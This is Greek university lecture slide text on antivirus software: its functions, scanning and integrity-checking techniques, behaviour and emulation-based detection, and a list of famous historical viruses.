Πανεπιστήμιο Αιγαίου ΑΝΤΙΒΙΟΤΙΚΟ ΛΟΓΙςΜΙΚΟ

Πανεπιστήμιο Αιγαίου Αντιβιοτικό Λογισμικό

Το αντιβιοτικό λογισμικό διεξάγει:

– ανίχνευση Κακόβουλου Λογισμικού σε ένα σύστημα

– ταυτοποίηση του Κακόβουλου Λογισμικού που έχει προσβάλλει το σύστημα

– αφαίρεση των τμημάτων κώδικα του Κακόβουλου Λογισμικού από τα αρχεία, ή (αν η αφαίρεση δεν είναι δυνατή) απομόνωση ή οριστική διαγραφή των προσβεβλημένων αρχείων

Πανεπιστήμιο Αιγαίου Αντιβιοτικό Λογισμικό:

Κατηγοριοποιήσεις Τεχνικών

Ανάλογα με τη Σειρά Εκτέλεσης (Order of Play) – Εκτέλεση Πρώτου Επιπέδου: ανίχνευση ιομορφών

προτού διεισδύσουν στο σύστημα – Εκτέλεση Δευτέρου Επιπέδου: ανίχνευση ιομορφών

που έχουν ήδη διεισδύσει το σύστημα

Σύμφωνα με το Χρόνο Εκτέλεσης (Time of Play) – Κατά την Πρόσβαση: όλα τα αρχεία που

προσπελαύνονται από οποιαδήποτε εφαρμογή ελέγχονται, χωρίς μεσολάβηση του χρήστη

– Κατά τη Ζήτηση: ο χρήστης διενεργεί έλεγχο των αρχείων ενός συστήματος σε χρόνο της επιλογής του

Πανεπιστήμιο Αιγαίου Αντιβιοτικό Λογισμικό:

Τεχνικές 1(2)

Ανιχνευτές – Πρώτης γενεάς: ανίχνευση ιομορφών με χρήση

υπογραφών (ακολουθίες κώδικα) ταυτοποιημένων ιομορφών

– Δεύτερης γενεάς: χρήση ευριστικών μεθόδων Ελεγκτές Ακεραιότητας

– Αποθηκεύουν δεδομένα ακεραιότητας για κάθε αρχείο και τομέα του συστήματος, παρέχοντας έτσι τη δυνατότητα στο διαχειριστή να γνωρίζει ποια αρχεία έχουν τροποποιηθεί, από το χρονικό σημείο της τελευταίας καταγραφής δεδομένων ακεραιότητας. Η τροποποίηση ορισμένων αρχείων (π.χ. εκτελέσιμα) πρέπει να εξετάζεται περαιτέρω από τους διαχειριστές

Πανεπιστήμιο Αιγαίου

Αντιβιοτικό Λογισμικό: Τεχνικές 2(2)

Αντιβιοτικό Λογισμικό Ελέγχου Συμπεριφοράς – Εντοπίζει συγκεκριμένες ύποπτες ενέργειες λογισμικού

(π.χ. εγγραφή δεδομένων σε ένα εκτελέσιμο αρχείο)

Ανιχνευτές Εικονικής Μηχανής – Εξομοίωση της εκτέλεσης ενός προγράμματος σε

ελεγχόμενο περιβάλλον με σκοπό τον εντοπισμό ιομορφικής συμπεριφοράς

Πανεπιστήμιο Αιγαίου Οι πιο γνωστοί Ιοί

Morris (1988) I love U (2000) Melissa (1999-2005) Code Red (2001) Slammer (2003) Sasser (2004) Nimda (2001) Blaster (2003) Storm (2007) Conficker (2008) STUXNET(2010)